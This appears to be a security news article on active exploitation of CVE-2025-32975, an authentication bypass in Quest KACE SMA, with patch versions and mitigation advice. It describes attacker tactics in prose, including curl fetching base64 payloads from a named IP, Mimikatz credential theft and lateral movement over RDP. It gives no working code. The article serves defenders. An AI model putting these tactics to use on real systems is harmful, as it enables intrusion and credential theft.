Arctic Wolf warns of active exploitation of CVE-2025-32975, a critical authentication bypass vulnerability in Quest KACE SMA systems that enables complete administrative takeover.
Threat actors are actively exploiting a critical vulnerability in Quest KACE Systems Management Appliance (SMA) to compromise enterprise environments, according to cybersecurity firm Arctic Wolf. The flaw, tracked as CVE-2025-32975 with a maximum CVSS score of 10.0, enables attackers to bypass authentication and gain complete administrative control over unpatched systems exposed to the internet.
Active Exploitation Campaign Detected
The malicious activity was first observed the week of March 9, 2026, targeting customer environments where KACE SMA instances remained unpatched. Arctic Wolf noted that the exploitation patterns are consistent with CVE-2025-32975 attacks, though the ultimate objectives of the threat actors remain unclear.
The vulnerability allows attackers to impersonate legitimate users without valid credentials, effectively granting them administrative privileges. Quest Software addressed the flaw in May 2025, releasing patches for multiple versions including 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4).
Attack Chain and Tactics
Once exploiting the authentication bypass, attackers have been observed executing a sophisticated attack chain:
- Initial Foothold: Threat actors weaponize the vulnerability to seize administrative accounts and execute remote commands
- Payload Delivery: Base64-encoded payloads are downloaded from external servers (specifically 216.126.225[.]156) using curl commands
- Privilege Escalation: Additional administrative accounts are created via "runkbot.exe," a background process associated with the SMA Agent
- Persistence Mechanisms: Windows Registry modifications are made through PowerShell scripts for potential persistence or system configuration changes
Post-Exploitation Activities
The attackers have demonstrated advanced post-exploitation capabilities, including:
- Credential Harvesting: Deployment of Mimikatz for extracting authentication credentials from memory
- Network Discovery: Enumeration of logged-in users and administrator accounts using commands like "net time" and "net group"
- Lateral Movement: Obtaining Remote Desktop Protocol (RDP) access to critical infrastructure including backup systems (Veeam, Veritas) and domain controllers
Mitigation Recommendations
Administrators are strongly advised to take immediate action:
- Apply Patches Immediately: Install the latest KACE SMA updates for affected versions
- Network Segmentation: Avoid exposing SMA instances directly to the internet
- Access Controls: Review and restrict administrative account privileges
- Monitoring: Implement enhanced logging and monitoring for suspicious activities
- Backup Security: Ensure backup infrastructure is properly isolated and secured
Broader Context
The exploitation of CVE-2025-32975 highlights the ongoing risks associated with internet-exposed management systems. KACE SMA is widely used for endpoint management, software distribution, and patch management across enterprise environments, making it an attractive target for threat actors seeking broad network access.
This incident follows a pattern of critical vulnerabilities in enterprise management tools being actively exploited in the wild, emphasizing the importance of timely patching and proper network architecture design to minimize attack surfaces.
Organizations running unpatched KACE SMA systems should prioritize remediation efforts, as the combination of authentication bypass and administrative access provides attackers with the means to compromise entire IT infrastructures.
Comments
Please log in or register to join the discussion